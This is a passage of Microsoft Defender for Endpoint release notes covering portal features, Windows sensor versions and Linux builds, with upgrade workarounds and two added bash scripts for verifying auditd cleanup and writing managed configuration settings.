     - Group policy: Computer Configuration > Administrative Templates > Windows Components > Microsoft Defender Antivirus > Features > Device Control > Select Device Control Default Enforcement. See Deploy and manage device control with Group Policy.
- Microsoft Defender for Endpoint device control: the new Printer Protection solution to manage printers is now available. For more information, see Device control policies.

November 2022
- Built-in protection is now generally available. Built-in protection helps protect your organization from ransomware and other threats with default settings that help ensure your devices are protected.

October 2022
- Network protection C2 detection and remediation is now generally available. Attackers often compromise existing internet-connected servers to use as their command and control servers. Attackers can use the compromised servers to hide malicious traffic and deploy malicious bots that are used to infect endpoints. Network protection detection and remediation helps reduce the time it takes security operations (SecOps) teams to pinpoint and respond to malicious network threats that are looking to compromise endpoints.

September 2022
- The attack surface reduction rules report is now available in the Microsoft Defender portal. This ASR report provides information about the attack surface reduction rules that are applied to devices in your organization and helps you detect threats, block potential threats, and get visibility into ASR and device configuration.
- Built-in protection (preview) is rolling out. Built-in protection is a set of default settings, such as tamper protection turned on, to help protect devices from ransomware and other threats.
- Device health reporting is now generally available. The device health report provides information about the health and security of your endpoints. The report includes trending information showing the sensor health state, antivirus status, OS platforms, Windows 10 versions, and Microsoft Defender Antivirus update versions.
- Device health reporting is now available for US Government customers using Defender for Endpoint (GCC, GCC High, and DoD).
- Troubleshooting mode is now available for more Windows operating systems, including Windows Server 2012 R2 and above. See the article for more information about the required updates.

August 2022
- Device health status. The Device health status card shows a summarized health report for the specific device.
- Device health reporting (preview). The devices status report provides high-level information about the devices in your organization. The report includes trending information showing the sensor health state, antivirus status, OS platforms, and Windows 10 versions.
- Tamper protection on macOS is now generally available. This feature is released with audit mode enabled by default, and you can decide whether to enforce (block) or turn off the capability. Later this year, we'll offer a gradual rollout mechanism that will automatically switch endpoints to block mode; note that this applies only if you have not made a choice to either enable (block mode) or disable the capability.
- Network Protection and Web Protection for macOS and Linux are now in public preview. Network Protection helps reduce the attack surface of your devices from Internet-based events. It prevents employees from using any application to access dangerous domains that may host phishing scams, exploits, and other malicious content on the Internet. It's the foundation on which Web Protection for Microsoft Defender for Endpoint is built. These capabilities include web threat protection, web content filtering, and IP/URL custom indicators. Web protection enables you to secure your devices against web threats and helps to regulate unwanted content.
- Improved Microsoft Defender for Endpoint onboarding for Windows Server 2012 R2 and Windows Server 2016. Configuration Manager version 2207 now supports automatic deployment of the modern, unified Microsoft Defender for Endpoint agent for Windows Server 2012 R2 and 2016. Windows Server 2012 R2 and 2016 devices that are targeted with a Microsoft Defender for Endpoint onboarding policy will use the unified agent instead of the existing Microsoft Monitoring Agent based solution, if configured through Client Settings.

July 2022
- Add domain controller devices (evaluation lab enhancement). Now generally available: add a domain controller to run complex scenarios such as lateral movement and multistage attacks across multiple devices.
- File page enhancements in Microsoft Defender for Endpoint. Investigating files in Microsoft Defender for Endpoint is now easier with enhancements to the File page and side panel. Users can streamline processes with a more efficient navigation experience that hosts all this information in one place.
- The new alert suppression experience. The new and advanced alert suppression experience is now generally available. The new experience provides tighter granularity and control, allowing users to tune Microsoft Defender for Endpoint alerts.
- Prevent compromised unmanaged devices from moving laterally in your organization with "Contain". Starting today, when a device that isn't enrolled in Microsoft Defender for Endpoint is suspected of being compromised, a SOC analyst can "Contain" it. As a result, any device enrolled in Microsoft Defender for Endpoint will now block any incoming/outgoing communication with the suspected device.
- Mobile device support is now available for US Government customers using Defender for Endpoint. Microsoft Defender for Endpoint for US Government customers is built in the Azure US Government environment and uses the same underlying technologies as Defender in Azure Commercial. This offering is available to GCC, GCC High, and DoD customers and further extends platform availability from Windows, macOS, and Linux to Android and iOS devices as well.

June 2022
- Defender for Servers Plan 2 now integrates with the MDE unified solution. You can now start deploying the modern, unified solution for Windows Server 2012 R2 and 2016 to servers covered by Defender for Servers Plan 2 using a single button.
- Mobile Network Protection in Microsoft Defender for Endpoint on Android and iOS is now in public preview. Microsoft offers a mobile network protection feature in Defender for Endpoint that helps organizations identify, assess, and remediate endpoint weaknesses with the help of robust threat intelligence. Users can now benefit from this new feature on both Android and iOS platforms with Microsoft Defender for Endpoint.


What's new in Microsoft Defender for Endpoint on Windows
Article • 12/06/2023

Applies to:

- Microsoft Defender for Endpoint Plan 1
- Microsoft Defender for Endpoint Plan 2
- Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

This page covers the Microsoft Defender for Endpoint EDR sensor (MsSense.exe) versions. You can also check the file information section in the monthly cumulative rollup updates in the following articles:

- Windows 11 release information
- Windows 10 updates
- Windows Server 2022 updates
- Windows Server 2019 updates

For the latest updates to Microsoft Defender for Endpoint overall, see What's new in Defender for Endpoint.

For the latest updates to Microsoft Defender for Endpoint next-generation protection (Microsoft Defender Antivirus), see Microsoft Defender Antivirus security intelligence and product updates.

All updates contain:

- Performance improvements
- Serviceability improvements
- Integration improvements (Cloud, Microsoft Defender XDR)

Dec-2023 (Release version: 10.8672.25926.1019)

| OS | KB | Release version |
|---|---|---|
| Windows Server 2012 R2, 2016 | KB 5005292 | 10.8672.25926.1019 |

What's new

- Supports expanded User Contain capabilities

Sept-2023 (Release version: 10.8560.25364.1036)

| OS | KB | Release version |
|---|---|---|
| Windows Server 2012 R2, 2016 | KB 5005292 | 10.8560.25364.1036 |

What's new

- Supports User Contain availability

May-2023 (Release version: 10.8295.22621.1023)

| OS | KB | Release version |
|---|---|---|
| Windows Server 2012 R2, 2016 | KB 5005292 | 10.8295.22621.1023 |

What's new

- Supports new security settings management capabilities

Jan/Feb-2023 (Release version: 10.8295.22621.1019)

| OS | KB | Release version |
|---|---|---|
| Windows Server 2012 R2, 2016 | KB 5005292 | 10.8295.22621.1019 |

What's new

- Improved command and control security, quality fixes

Dec-2022 (Release version: 10.8210.22621.1016)

| OS | KB | Release version |
|---|---|---|
| Windows Server 2012 R2, 2016 | KB 5005292 | 10.8210.22621.1016 |

What's new

- Bug fixes and stability improvements

Aug-2022 (Release version: 10.8210.*)

| OS | KB | Release version |
|---|---|---|
| Windows Server 2012 R2, 2016 | KB 5005292 | 10.8210.22621.1011 |
| Windows 11 21H2 (Cobalt) (Windows 11 SV 21H2) | KB 5016691 | 10.8210.22000.918 |
| Server 2022 (Iron) | KB 5016693 | 10.8210.20348.946 |
| Windows 10 20H2/21H1/21H2, Windows Server 20H2 (Vibranium) | KB 5016688 | 10.8210.19041.1949 |
| Windows Server 2019 (RS5) | KB 5016690 | 10.8210.17763.3346 |

What's new

- Added a fix to resolve a missing intermediate certificate issue with the use of "TelemetryProxyServer" on Windows Server 2012 R2 running the unified agent.
- Enhanced Endpoint DLP with the ability to protect password-protected and encrypted files, and to not label files.
- Enhanced Endpoint DLP with support for context data in audit telemetry (short evidence).
- Improved Microsoft Defender for Endpoint client authentication support for VDI devices.
- Enhanced Microsoft Defender for Endpoint's ability to identify and intercept ransomware and advanced attacks.
- The Contain feature now supports more desktop and server versions to perform the Contain action and block discovered devices when these are contained.
- Expanded the troubleshooting mode feature to additional desktop and server versions. For a complete list of supported OS versions and more information about prerequisites, see Get started with troubleshooting mode in Microsoft Defender for Endpoint.
- Live Response improvements include reduced session creation latency when using proxies, an undo Remediation manual command, support for OneDrive share in the FindFile action, and improved isolation and stability.
- Security Management for Microsoft Defender for Endpoint now provides the ability to sync the device configuration on demand instead of waiting for a specific cadence.

Note

Update package KB5005292 is on a gradual rollout schedule through Windows Update. Towards the end of this schedule, the package will be published completely, including to the update catalog for manual download. For the current release, this will be in the second half of October. If you want to test the package sooner, you can use gradual rollout controls for platform updates to select the Preview channel.

See also:

- What's new in Microsoft Defender for Endpoint
- What's new in Defender for Endpoint on macOS
- What's new in Defender for Endpoint on iOS
- What's new in Defender for Endpoint on Linux


What's new in Microsoft Defender for Endpoint on Linux
Article • 02/12/2024

Applies to:

- Microsoft Defender for Endpoint Plan 1
- Microsoft Defender for Endpoint Plan 2

This article is updated frequently to let you know what's new in the latest releases of Microsoft Defender for Endpoint on Linux.

- What's new in Defender for Endpoint on macOS
- What's new in Defender for Endpoint on iOS

February-2024 (Build: 101.23122.0002 | Release version: 30.123122.0002.0)

Released: February 5, 2024
Published: February 5, 2024
Build: 101.23122.0002
Release version: 30.123122.0002.0
Engine version: 1.1.23100.2010
Signature version: 1.399.1389.0

What's new

There are multiple fixes and new changes in this release:

- Microsoft Defender for Endpoint on Linux now officially supports Mariner 2, Rocky 8.7 and higher, and Alma 9.2 and higher. If you already have Defender for Endpoint running on any of these distros and are facing issues on older versions, upgrade to the latest Defender for Endpoint version. Refer to the public deployment docs for more details.
- Updated default engine version to 1.1.23100.2010, and default signatures version to 1.399.1389.0.
- General stability and performance improvements.
- Bug fixes.

January-2024 (Build: 101.23112.0009 | Release version: 30.123112.0009.0)

Released: January 29, 2024
Published: January 29, 2024
Build: 101.23112.0009
Release version: 30.123112.0009.0
Engine version: 1.1.23100.2010
Signature version: 1.399.1389.0

What's new

- Updated default engine version to 1.1.23110.4, and default signatures version to 1.403.1579.0.
- General stability and performance improvements.
- Bug fix for behavior monitoring configuration.
- Bug fixes.

November-2023 (Build: 101.23102.0003 | Release version: 30.123102.0003.0)

Released: November 28, 2023
Published: November 28, 2023
Build: 101.23102.0003
Release version: 30.123102.0003.0
Engine version: 1.1.23090.2008
Signature version: 1.399.690.0

What's new

- Updated default engine version to 1.1.23090.2008, and default signatures version to 1.399.690.0.
- Updated the libcurl library to version 8.4.0 to fix recently disclosed vulnerabilities in the older version.
- Updated the OpenSSL library to version 3.1.1 to fix recently disclosed vulnerabilities in the older version.
- General stability and performance improvements.
- Bug fixes.

November-2023 (Build: 101.23092.0012 | Release version: 30.123092.0012.0)

Released: November 14, 2023
Published: November 14, 2023
Build: 101.23092.0012
Release version: 30.123092.0012.0
Engine version: 1.1.23080.2007
Signature version: 1.395.1560.0

What's new

There are multiple fixes and new changes in this release:

- Support added to restore a quarantined threat to its original path using the following command:

  Bash

  sudo mdatp threat quarantine restore threat-path --path [threat-original-path] --destination-path [destination-folder]

- Starting with this release, Microsoft Defender for Endpoint on Linux will no longer ship a solution for RHEL 6. RHEL 6 Extended end of life support is scheduled to end by June 30, 2024, and customers are advised to plan their RHEL upgrades accordingly, aligned with guidance from Red Hat. Customers who need to run Defender for Endpoint on RHEL 6 servers can continue to use version 101.23082.0011 (does not expire before June 30, 2024), supported on kernel versions 2.6.32-754.49.1.el6.x86_64 or prior.
- Engine update to 1.1.23080.2007 and signatures version 1.395.1560.0.
- The streamlined device connectivity experience is now in public preview (see the public blog).
- Performance improvements and bug fixes.

Known issues

- CPU lock-up seen on kernel version 5.15.0-0.30.20 in eBPF mode; see Use eBPF-based sensor for Microsoft Defender for Endpoint on Linux for details and mitigation options.

November-2023 (Build: 101.23082.0011 | Release version: 30.123082.0011.0)

Released: November 1, 2023
Published: November 1, 2023
Build: 101.23082.0011
Release version: 30.123082.0011.0
Engine version: 1.1.23070.1002
Signature version: 1.393.1305.0

What's new

This release is built on the October 2023 release (101.23082.0009) with the following additional changes. There's no change for other customers, and upgrading is optional.

- Fix for auditd immutable mode when the supplementary subsystem is eBPF: after switching to eBPF mode and rebooting, all mdatp audit rules should be removed. Previously the mdatp audit rules were not cleaned up after reboot, which caused the server to hang. The fix removes these rules, so no mdatp audit rules should be loaded after a reboot.
- Fix for Defender for Endpoint not starting up on RHEL 6.
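
To confirm the auditd fix on a host after switching the supplementary subsystem to eBPF and rebooting, the following check is an added example; it is not Microsoft's code and not part of the original release notes. It assumes the health field is named supplementary_events_subsystem, that mdatp's audit rules carry the key -k mdatp in auditctl -l output, and that auditctl -s reports immutable mode as enabled 2; verify those names against your build before relying on the script. The rule listing in the comments is constructed.

```bash
#!/usr/bin/env bash
# Added example (not Microsoft's code): after switching the supplementary
# subsystem to eBPF and rebooting, confirm that no mdatp audit rules are
# still loaded into auditd, which is what the 101.23082.0011 fix guarantees.
# Assumptions (not stated in the release notes): the health field is
# "supplementary_events_subsystem", mdatp audit rules carry "-k mdatp" in
# "auditctl -l" output, and "auditctl -s" reports immutable mode as "enabled 2".

# Returns 0 when the sensor reports eBPF as the supplementary event provider.
# $1 = raw value from: mdatp health --field supplementary_events_subsystem
uses_ebpf() {
  [ "$(printf '%s' "$1" | tr -d '"[:space:]')" = "ebpf" ]
}

# Prints how many mdatp audit rules remain in a rule listing (auditctl -l).
# $1 = the listing text, e.g. (constructed sample):
#   -a always,exit -F arch=b64 -S execve -k mdatp
#   -w /etc/passwd -p wa -k identity
# Expect 0 after the fix.
count_mdatp_audit_rules() {
  local n
  n=$(printf '%s\n' "$1" | grep -c -- '-k mdatp') || n=0
  printf '%s\n' "$n"
}

# Returns 0 when auditd is locked in immutable mode ("enabled 2" in auditctl -s).
# $1 = the status text.
audit_is_immutable() {
  printf '%s\n' "$1" | grep -Eq '^enabled[[:space:]]+2$'
}

# Combines the checks. Returns 0 only if eBPF is active and no mdatp rules are
# loaded. Immutable mode is reported but does not fail the check: that is
# exactly the configuration the bug affected, and the fix is expected to work
# with it.
verify_ebpf_switch() {
  local subsystem="$1" rules="$2" status="$3" leftover
  if ! uses_ebpf "$subsystem"; then
    echo "supplementary subsystem is '$subsystem', not ebpf" >&2
    return 1
  fi
  if audit_is_immutable "$status"; then
    echo "auditd is in immutable mode (enabled 2)" >&2
  fi
  leftover=$(count_mdatp_audit_rules "$rules")
  if [ "$leftover" -ne 0 ]; then
    echo "$leftover mdatp audit rule(s) still loaded after reboot" >&2
    return 1
  fi
  return 0
}

# Live run on a host (auditctl needs root).
main() {
  verify_ebpf_switch \
    "$(mdatp health --field supplementary_events_subsystem)" \
    "$(auditctl -l 2>/dev/null)" \
    "$(auditctl -s 2>/dev/null)"
}

if [ "${1:-}" = "--run" ]; then
  main
fi
```

Run it as root with --run on a host that has rebooted after the switch. A nonzero exit with leftover mdatp rules means the condition the fix addresses is still present on that host; a nonzero exit on the subsystem check means the host never switched to eBPF in the first place and the auditd path is still in use.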

Known issues

When upgrading from mdatp version 101.75.43 or 101.78.13, you might encounter a kernel hang. Run the following commands before attempting to upgrade to version 101.98.05. For more information, see System hang due to blocked tasks in fanotify code.

There are two ways to mitigate this upgrade issue:

1. Use your package manager to uninstall the 101.75.43 or 101.78.13 mdatp version. Example:

   Bash

   sudo apt purge mdatp
   sudo apt-get install mdatp

2. As an alternative, you can follow the instructions to uninstall, then install the latest version of the package.

If you don't want to uninstall mdatp, you can disable RTP and mdatp in sequence before upgrading. Some customers (<1%) experience issues with this method.

Bash

sudo mdatp config real-time-protection --value=disabled
sudo systemctl disable mdatp

October-2023 (Build: 101.23082.0009 | Release version: 30.123082.0009.0)

Released: October 9, 2023
Published: October 9, 2023
Build: 101.23082.0009
Release version: 30.123082.0009.0
Engine version: 1.1.23070.1002
Signature version: 1.393.1305.0

What's new

This release is built on the earlier October 2023 release (101.23082.0006) with the addition of new CA certificates. There's no change for other customers, and upgrading is optional.

Known issues

When upgrading from mdatp version 101.75.43 or 101.78.13, you might encounter a kernel hang. Run the following commands before attempting to upgrade to version 101.98.05. For more information, see System hang due to blocked tasks in fanotify code.

There are two ways to mitigate this upgrade issue:

1. Use your package manager to uninstall the 101.75.43 or 101.78.13 mdatp version. Example:

   Bash

   sudo apt purge mdatp
   sudo apt-get install mdatp

2. As an alternative, you can follow the instructions to uninstall, then install the latest version of the package.

If you don't want to uninstall mdatp, you can disable RTP and mdatp in sequence before upgrading. Some customers (<1%) experience issues with this method.

Bash

sudo mdatp config real-time-protection --value=disabled
sudo systemctl disable mdatp

October-2023 (Build: 101.23082.0006 | Release version: 30.123082.0006.0)

Released: October 9, 2023
Published: October 9, 2023
Build: 101.23082.0006
Release version: 30.123082.0006.0
Engine version: 1.1.23070.1002
Signature version: 1.393.1305.0

What's new

Feature updates and new changes:

- The eBPF sensor is now the default supplementary event provider for endpoints.
- The Microsoft Intune tenant attach feature is in public preview (as of mid July). You must add "*.dm.microsoft.com" to firewall exclusions for the feature to work correctly.
- Defender for Endpoint is now available for Debian 12 and Amazon Linux 2023.
- Support for enabling signature verification of downloaded updates. Note that you must update managed.json as shown below:

  "features": {
    "OfflineDefinitionUpdateVerifySig": "enabled"
  }

  Prerequisite to enable the feature: the engine version on the device must be 1.1.23080.007 or above. Check your engine version by using the following command:

  mdatp health --field engine_version

- Option to support monitoring of NFS and FUSE mount points. These are ignored by default. The following example shows how to monitor all filesystems while ignoring only NFS:

  "antivirusEngine": {
    "unmonitoredFilesystems": ["nfs"]
  }

  Example to monitor all filesystems including NFS and FUSE:

  "antivirusEngine": {
    "unmonitoredFilesystems": []
  }

- Other performance improvements
- Bug fixes
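
The following script is an added example, not Microsoft's code, that ties the two managed.json settings above together: it checks the engine-version prerequisite with the health command quoted above before enabling signature verification, and renders the unmonitoredFilesystems list from arguments so the same script produces both examples from the notes. It assumes the managed file path /etc/opt/microsoft/mdatp/managed/mdatp_managed.json, which the notes don't state, and that mdatp health prints the engine version in double quotes.

```bash
#!/usr/bin/env bash
# Added example (not Microsoft's code): render the two managed.json settings
# from this release (update signature verification and NFS/FUSE monitoring)
# and enforce the documented engine-version prerequisite before installing it.
# Assumptions not stated in the release notes: the managed file is
# /etc/opt/microsoft/mdatp/managed/mdatp_managed.json, and
# "mdatp health --field engine_version" prints the version in double quotes.

MANAGED_JSON="${MANAGED_JSON:-/etc/opt/microsoft/mdatp/managed/mdatp_managed.json}"
MIN_ENGINE_FOR_SIGVERIFY="1.1.23080.007"

# version_ge A B: 0 when dotted version A is >= B. sort -V compares each
# numeric segment, so 1.1.23100.2010 sorts after 1.1.23080.007.
version_ge() {
  [ "$(printf '%s\n' "$1" "$2" | sort -V | head -n 1)" = "$2" ]
}

# Prerequisite from the notes: signature verification needs engine
# 1.1.23080.007 or later. $1 = engine version (surrounding quotes tolerated).
engine_supports_sigverify() {
  version_ge "$(printf '%s' "$1" | tr -d '"')" "$MIN_ENGINE_FOR_SIGVERIFY"
}

# Prints the managed configuration. Arguments are the filesystem types to
# leave unmonitored (for example: nfs fuse). No arguments means monitor
# everything, including NFS and FUSE, which is the second example in the notes.
render_managed_json() {
  local list="" fs
  for fs in "$@"; do
    list="${list:+$list, }\"$fs\""
  done
  cat <<EOF
{
  "features": {
    "OfflineDefinitionUpdateVerifySig": "enabled"
  },
  "antivirusEngine": {
    "unmonitoredFilesystems": [$list]
  }
}
EOF
}

# Live run: refuse to enable signature verification on an engine that cannot
# honour it; otherwise write the managed file, ignoring only NFS.
main() {
  local engine
  engine=$(mdatp health --field engine_version)
  if ! engine_supports_sigverify "$engine"; then
    echo "engine $engine is older than $MIN_ENGINE_FOR_SIGVERIFY; update the engine first" >&2
    return 1
  fi
  render_managed_json nfs | sudo tee "$MANAGED_JSON" >/dev/null
  echo "wrote $MANAGED_JSON; confirm the applied settings with: mdatp health"
}

if [ "${1:-}" = "--run" ]; then
  main
fi
```

The prerequisite check matters because the feature flag is silently useless on an older engine: the daemon accepts the setting but cannot verify anything, so the script treats an old engine as a hard failure rather than writing a configuration that looks enforced and is not.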

Known issues

When upgrading from mdatp version 101.75.43 or 101.78.13, you might encounter a kernel hang. Run the following commands before attempting to upgrade to version 101.98.05. For more information, see System hang due to blocked tasks in fanotify code.

There are two ways to mitigate this upgrade issue:

1. Use your package manager to uninstall the 101.75.43 or 101.78.13 mdatp version. Example:

   Bash

   sudo apt purge mdatp
   sudo apt-get install mdatp

2. As an alternative, you can follow the instructions to uninstall, then install the latest version of the package.

If you don't want to uninstall mdatp, you can disable RTP and mdatp in sequence before upgrading. Some customers (<1%) experience issues with this method.

Bash

sudo mdatp config real-time-protection --value=disabled
sudo systemctl disable mdatp

September-2023 (Build: 101.23072.0021 | Release version: 30.123072.0021.0)

Released: September 11, 2023
Published: September 11, 2023
Build: 101.23072.0021
Release version: 30.123072.0021.0
Engine version: 1.1.20100.7
Signature version: 1.385.1648.0

What's new

There are multiple fixes and new changes in this release:

- In mde_installer.sh v0.6.3, users can use the --channel argument to provide the channel of the configured repository during cleanup. For example: sudo ./mde_installer.sh --clean --channel prod
- The Network Extension can now be reset by administrators using mdatp network-protection reset.
- Other performance improvements
- Bug fixes

Known issues

When upgrading from mdatp version 101.75.43 or 101.78.13, you might encounter a kernel hang. Run the following commands before attempting to upgrade to version 101.98.05. For more information, see System hang due to blocked tasks in fanotify code.

There are two ways to mitigate this upgrade issue:

1. Use your package manager to uninstall the 101.75.43 or 101.78.13 mdatp version. Example:

   Bash

   sudo apt purge mdatp
   sudo apt-get install mdatp

2. As an alternative, you can follow the instructions to uninstall, then install the latest version of the package.

If you don't want to uninstall mdatp, you can disable RTP and mdatp in sequence before upgrading. Some customers (<1%) experience issues with this method.

Bash

sudo mdatp config real-time-protection --value=disabled
sudo systemctl disable mdatp

July-2023 (Build: 101.23062.0010 | Release version: 30.123062.0010.0)

Released: July 26, 2023
Published: July 26, 2023
Build: 101.23062.0010
Release version: 30.123062.0010.0
Engine version: 1.1.20100.7
Signature version: 1.385.1648.0

What's new

There are multiple fixes and new changes in this release:

- If a proxy is set for Defender for Endpoint, it's now visible in the mdatp health command output.
- This release provides two options in mdatp diagnostic hot-event-sources:
  1. Files
  2. Executables
- Network Protection: connections that are blocked by Network Protection and have the block overridden by users are now correctly reported to Microsoft Defender XDR.
- Improved logging in Network Protection block and audit events for debugging.

Other fixes and improvements:

- From this version, enforcementLevel is set to passive mode by default, giving admins more control over where they want RTP on within their estate. This change only applies to fresh Defender for Endpoint deployments, for example, servers where Defender for Endpoint is being deployed for the first time. In update scenarios, servers that have Defender for Endpoint deployed with RTP on continue operating with RTP on even after updating to version 101.23062.0010.

Bug fixes:

- RPM database corruption issue in the Defender Vulnerability Management baseline has been fixed.
- Other performance improvements

Known issues

When upgrading from mdatp version 101.75.43 or 101.78.13, you might encounter a kernel hang. Run the following commands before attempting to upgrade to version 101.98.05. For more information, see System hang due to blocked tasks in fanotify code.

There are two ways to mitigate this upgrade issue:

1. Use your package manager to uninstall the 101.75.43 or 101.78.13 mdatp version. Example:

   Bash

   sudo apt purge mdatp
   sudo apt-get install mdatp

2. As an alternative, you can follow the instructions to uninstall, then install the latest version of the package.

If you don't want to uninstall mdatp, you can disable RTP and mdatp in sequence before upgrading. Some customers (<1%) experience issues with this method.

Bash

sudo mdatp config real-time-protection --value=disabled
sudo systemctl disable mdatp

July-2023 (Build: 101.23052.0009 | Release version: 30.123052.0009.0)

Released: July 10, 2023
Published: July 10, 2023
Build: 101.23052.0009
Release version: 30.123052.0009.0
Engine version: 1.1.20100.7
Signature version: 1.385.1648.0

What's new

There are multiple fixes and new changes in this release:

- The build version schema is updated from this release. While the major version number remains 101, the minor version number now has five digits followed by a four-digit patch number, that is, 101.xxxxx.yyyy.
- Improved Network Protection memory consumption under stress.
- Updated the engine version to 1.1.20300.5 and signature version to 1.391.2837.0.
- Bug fixes.

Known issues

When upgrading from mdatp version 101.75.43 or 101.78.13, you might encounter a kernel hang. Run the following commands before attempting to upgrade to version 101.98.05. For more information, see System hang due to blocked tasks in fanotify code.

There are two ways to mitigate this upgrade issue:

1. Use your package manager to uninstall the 101.75.43 or 101.78.13 mdatp version. Example:

   Bash

   sudo apt purge mdatp
   sudo apt-get install mdatp

2. As an alternative, you can follow the instructions to uninstall, then install the latest version of the package.

If you don't want to uninstall mdatp, you can disable RTP and mdatp in sequence before upgrading. Some customers (<1%) experience issues with this method.

Bash

sudo mdatp config real-time-protection --value=disabled
sudo systemctl disable mdatp

June-2023 (Build: 101.98.89 | Release version: 30.123042.19889.0)

Released: June 12, 2023
Published: June 12, 2023
Build: 101.98.89
Release version: 30.123042.19889.0
Engine version: 1.1.20100.7
Signature version: 1.385.1648.0

What's new

There are multiple fixes and new changes in this release:

- Improved Network Protection proxy handling.
- In passive mode, Defender for Endpoint no longer scans when a definition update happens.
- Devices continue to be protected even after the Defender for Endpoint agent has expired. We recommend upgrading the Defender for Endpoint Linux agent to the latest available version to receive bug fixes, features, and performance improvements.
- Removed the semanage package dependency.
- Engine update to 1.1.20100.7 and signatures version 1.385.1648.0.
- Bug fixes.

Known issues

While upgrading from mdatp version 101.75.43 or 101.78.13 , you might


encounter a kernel hang. Run the following commands before attempting to
upgrade to version 101.98.05 . For more information, see System hang due to
blocked tasks in fanotify code .

There are two ways to mitigate this upgrade issue:


1. Use your package manager to uninstall the 101.75.43 or 101.78.13 mdatp version.

Example:

Bash

sudo apt purge mdatp


sudo apt-get install mdatp

2. As an alternative you can follow the instructions to uninstall, then install the latest
version of the package.

If you don't want to uninstall mdatp, you can disable rtp and mdatp in sequence before
upgrading. Some customers (<1%) experience issues with this method.

Bash

sudo mdatp config real-time-protection --value=disabled


sudo systemctl disable mdatp

May-2023 (Build: 101.98.64 | Release version: 30.123032.19864.0)

Released: May 3, 2023
Published: May 3, 2023
Build: 101.98.64
Release version: 30.123032.19864.0
Engine version: 1.1.20100.6
Signature version: 1.385.68.0

What's new

There are multiple fixes and new changes in this release:

Health message improvements to capture details about auditd failures.
Improvements to handle augenrules, which was causing installation failure.
Periodic memory cleanup in the engine process.
Fix for a memory issue in the mdatp audisp plugin.
Handled a missing plugin directory path during installation.
When a conflicting application is using blocking fanotify, mdatp health showed unhealthy with the default configuration. This is now fixed.
Support for ICMP traffic inspection in BM.
Engine update to 1.1.20100.6 and signature version 1.385.68.0.
Bug fixes.

Known issues

While upgrading from mdatp version 101.75.43 or 101.78.13, you might encounter a kernel hang. Run the following commands before attempting to upgrade to version 101.98.05. For more information, see System hang due to blocked tasks in fanotify code.

There are two ways to mitigate this upgrade issue:

1. Use your package manager to uninstall the 101.75.43 or 101.78.13 mdatp version.

Example:

Bash

sudo apt purge mdatp
sudo apt-get install mdatp

2. As an alternative, you can follow the instructions to uninstall, then install the latest version of the package.

If you don't want to uninstall mdatp, you can disable real-time protection (rtp) and the mdatp service in sequence before upgrading. Caution: Some customers (<1%) experience issues with this method.

Bash

sudo mdatp config real-time-protection --value=disabled
sudo systemctl disable mdatp

April-2023 (Build: 101.98.58 | Release version: 30.123022.19858.0)

Released: April 20, 2023
Published: April 20, 2023
Build: 101.98.58
Release version: 30.123022.19858.0
Engine version: 1.1.20000.2
Signature version: 1.381.3067.0

What's new

There are multiple fixes and new changes in this release:

Logging and error reporting improvements for auditd.
Handle failure in reload of auditd configuration.
Handling for empty auditd rule files during MDE install.
Engine update to 1.1.20000.2 and signature version 1.381.3067.0.
Addressed a health issue in mdatp that occurs due to SELinux denials.
Bug fixes.

Known issues

While upgrading mdatp to version 101.94.13 or later, you might notice that health is false, with health_issues as "no active supplementary event provider". This can happen due to misconfigured or conflicting auditd rules on existing machines. To mitigate the issue, the auditd rules on the existing machines need to be fixed. The following commands can help you identify such auditd rules (they need to be run as superuser). Take a backup of the following file first: /etc/audit/rules.d/audit.rules, as these steps are only to identify failures.

Bash

echo -c >> /etc/audit/rules.d/audit.rules
augenrules --load

While upgrading from mdatp version 101.75.43 or 101.78.13, you could encounter a kernel hang. Run the following commands before attempting to upgrade to version 101.98.05. For more information, see System hang due to blocked tasks in fanotify code.

There are two ways to mitigate this upgrade issue:

1. Use your package manager to uninstall the 101.75.43 or 101.78.13 mdatp version.

Example:

Bash

sudo apt purge mdatp
sudo apt-get install mdatp

2. As an alternative, you can follow the instructions to uninstall, then install the latest version of the package.

If you don't want to uninstall mdatp, you can disable real-time protection (rtp) and the mdatp service in sequence before upgrading. Caution: Some customers (<1%) experience issues with this method.

Bash

sudo mdatp config real-time-protection --value=disabled
sudo systemctl disable mdatp

March-2023 (Build: 101.98.30 | Release version: 30.123012.19830.0)

Released: March 20, 2023
Published: March 20, 2023
Build: 101.98.30
Release version: 30.123012.19830.0
Engine version: 1.1.19900.2
Signature version: 1.379.1299.0

What's new

This new release is built over the March 2023 release (101.98.05) with a fix for Live Response commands failing for one of our customers. There's no change for other customers, and the upgrade is optional.

Known issues

With mdatp version 101.98.30, you might see a health false issue in some cases, because SELinux rules aren't defined for certain scenarios. The health warning could look something like this:

found SELinux denials within last one day. If the MDATP is recently installed, clear the existing audit logs or wait for a day for this issue to autoresolve. Use command: "sudo ausearch -i -c 'mdatp_audisp_pl' | grep "type=AVC" | grep " denied" to find details

The issue can be mitigated by running the following commands:

Bash

sudo ausearch -c 'mdatp_audisp_pl' --raw | sudo audit2allow -M my-mdatpaudisppl_v1
sudo semodule -i my-mdatpaudisppl_v1.pp

Here, my-mdatpaudisppl_v1 represents the policy module name. After you run the commands, either wait for 24 hours or clear/archive the audit logs. The audit logs can be archived by running the following commands:

Bash

sudo service auditd stop
sudo systemctl stop mdatp
cd /var/log/audit
sudo gzip audit.*
sudo service auditd start
sudo systemctl start mdatp
mdatp health

If the issue reappears with different denials, run the mitigation again with a different module name (for example, my-mdatpaudisppl_v2).

March-2023 (Build: 101.98.05 | Release version: 30.123012.19805.0)

Released: March 08, 2023
Published: March 08, 2023
Build: 101.98.05
Release version: 30.123012.19805.0
Engine version: 1.1.19900.2
Signature version: 1.379.1299.0

What's new

There are multiple fixes and new changes in this release:

Improved data completeness for Network Connection events.
Improved data collection capabilities for file ownership/permissions changes.
semanage is now part of the package, so that SELinux policies can be configured on different distros (fixed).
Improved enterprise daemon stability.
AuditD stop path clean-up.
Improved the stability of the mdatp stop flow.
Added a new field to wdavstate to keep track of the platform update time.
Stability improvements to parsing the Defender for Endpoint onboarding blob.
Scan doesn't proceed if a valid license isn't present (fixed).
Added a performance tracing option to xPlatClientAnalyzer; with tracing enabled, the mdatp process dumps the flow into the all_process.zip file, which can be used for analysis of performance issues.
Added support in Defender for Endpoint for the following RHEL-6 kernel versions:
2.6.32-754.43.1.el6.x86_64
2.6.32-754.49.1.el6.x86_64
Other fixes.

Known issues

